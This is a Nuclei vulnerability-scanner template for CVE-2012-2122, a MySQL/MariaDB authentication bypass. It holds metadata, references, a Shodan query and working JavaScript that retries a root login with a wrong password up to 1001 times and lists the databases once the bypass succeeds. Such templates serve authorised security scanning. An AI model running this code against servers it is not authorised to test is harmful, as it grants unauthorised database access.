nuclei-templates/javascript/cves/2012/CVE-2012-2122.yaml

61 lines
2.1 KiB
YAML

id: CVE-2012-2122
info:
name: MySQL - Authentication Bypass
author: pussycat0x
severity: medium
description: |
sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
reference:
- https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122
- http://kb.askmonty.org/en/mariadb-5162-release-notes/
- http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00007.html
- http://security.gentoo.org/glsa/glsa-201308-06.xml
- http://securitytracker.com/id?1027143
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:H/Au:N/C:P/I:P/A:P
cvss-score: 5.1
cve-id: CVE-2012-2122
cwe-id: CWE-287
epss-score: 0.97019
epss-percentile: 0.99732
cpe: cpe:2.3:a:oracle:mysql:5.1.51:*:*:*:*:*:*:*
metadata:
verified: true
vendor: oracle
product: mysql
shodan-query: product:"MySQL"
tags: cve,cve2012,js,enum,network,mssql,fuzz
javascript:
- code: |
const mysql = require('nuclei/mysql');
const client = new mysql.MySQLClient;
for (let i = 1; i <= 1001; i++) {
try {
const connected = client.ExecuteQuery(Host, Port, User, Pass, Query);
Export(connected);
break;
} catch {
// error
}
}
args:
Host: "{{Host}}"
Port: 3306
User: "root"
Pass: "wrong"
Query: "show databases;"
matchers:
- type: dsl
dsl:
- "success == true"
extractors:
- type: json
part: response
json:
- .Rows[] | .Database
# digest: 4a0a004730450220257cea6847023e5a3eadf5c1a18c4f2a2df145542fe09c89c61ddad28bfe44e9022100e5936a8580cc7882f2e8c441aff795b4fc479fa6552599a3eb1abca1ac7f9a65:922c64590222798bb761d5b6d8e72950